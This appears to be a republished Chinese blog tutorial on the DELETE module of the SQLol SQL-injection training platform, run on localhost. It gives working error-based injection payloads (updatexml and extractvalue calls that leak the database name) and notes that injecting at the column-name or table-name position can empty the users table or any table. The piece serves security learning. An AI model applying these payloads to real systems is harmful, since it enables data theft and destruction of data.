SQL注入测试平台 SQLol -5.DELETE注入测试

Posted 专注于网络安全

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入测试平台 SQLol -5.DELETE注入测试相关的知识,希望对你有一定的参考价值。

  访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。

delete语法:

DELETE FROM 【users】 WHERE 【username】 = 【\'1\'】

  

几个位置都可能存在注入,这里只演示一种。

下面演示注入到不同位置的方法。

 

一、String in WHERE clause

构造POC:

\' or updatexml(1,concat(0x7e,(database()),0x7e),0) or \'

获取数据库


二、Integer in WHERE clause

构造POC:

\'\' or extractvalue(1,concat(0x7e,database())) or \'\'

获取数据库


三、Column Name

注入点在【1】处

DELETE FROM users WHERE 【1】 = 1 

利用方式:

1、清空users表

2、构造报错注入语句

 


四、Table Name

注入点在【1】处

DELETE FROM 1 WHERE isadmin = 0 

利用方式:

1、清空任意表

2、构造报错,爆出数据

最后

欢迎关注个人微信公众号:Bypass--,每周一篇原创高质量的干货。 

 

以上是关于SQL注入测试平台 SQLol -5.DELETE注入测试的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入测试平台 SQLol -3.INSERT注入测试

SQL注入测试平台 SQLol -6.challenges挑战

SQL注入测试平台:Sqli-Labs(附带使用指南-Part1)

jSQL注入 - 一个跨平台的SQL注入工具

DVWA演练平台之SQL注入(全新认识)

SQL回显